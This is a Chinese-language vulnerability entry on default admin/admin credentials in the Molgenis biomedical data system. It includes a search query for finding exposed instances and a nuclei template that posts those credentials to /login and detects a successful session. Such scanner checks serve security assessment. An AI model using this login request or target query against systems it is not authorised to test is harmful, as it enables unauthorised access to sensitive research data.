漏洞信息
漏洞名称: Molgenis Default Login Vulnerability
漏洞类型: 弱口令
漏洞等级: 高危
漏洞描述: Molgenis是一个开源的数据管理系统,广泛应用于生物医学研究领域,用于存储、管理和分析大量的生物医学数据。该系统提供了一个用户友好的界面,支持数据的导入、导出和可视化分析,是许多研究机构和实验室的重要工具。该漏洞涉及Molgenis系统的默认登录凭证问题。具体来说,系统在安装后保留了默认的用户名和密码(admin/admin),如果管理员未及时更改这些凭证,攻击者可以利用这些默认凭证成功登录系统。这种漏洞的根源在于系统安装后的初始配置不当,未能强制或提醒管理员修改默认凭证。由于Molgenis系统通常处理敏感的科研数据,这种漏洞可能导致严重的安全风险。攻击者一旦登录系统,可以访问、修改或删除存储在系统中的数据,甚至可能利用系统权限执行更高级的攻击。值得注意的是,这种漏洞的利用不需要任何复杂的技巧,攻击者只需尝试使用默认凭证即可,因此风险等级被评定为高危。为了防止此类漏洞的利用,建议所有Molgenis系统的管理员在安装后立即更改默认的登录凭证,并定期检查系统的安全配置。
产品厂商: Molgenis
产品名称: Molgenis
搜索语法: html:”MOLGENIS”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/8b50cbcf8c7e827312fa38a050f54184a1380a50/http%2Fdefault-logins%2Fmolgenis-default-login.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49
| id: molgenis-default-login
info: name: Molgenis - Default Login author: ritikchaddha severity: high description: | Attempts to login to Molgenis using the default credentials (admin/admin). Successful login may indicate a security risk due to unchanged default credentials. reference: - https://molgenis.org/ - https://github.com/molgenis/molgenis-emx2 metadata: verified: true max-request: 1 shodan-query: html:"MOLGENIS" tags: molgenis,default-login,exposure
variables: username: 'admin' password: 'admin'
http: - raw: - | POST /login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
matchers-condition: and matchers: - type: word part: location words: - "/login?error" negative: true
- type: word part: header words: - "Set-Cookie: JSESSIONID="
- type: status status: - 302
|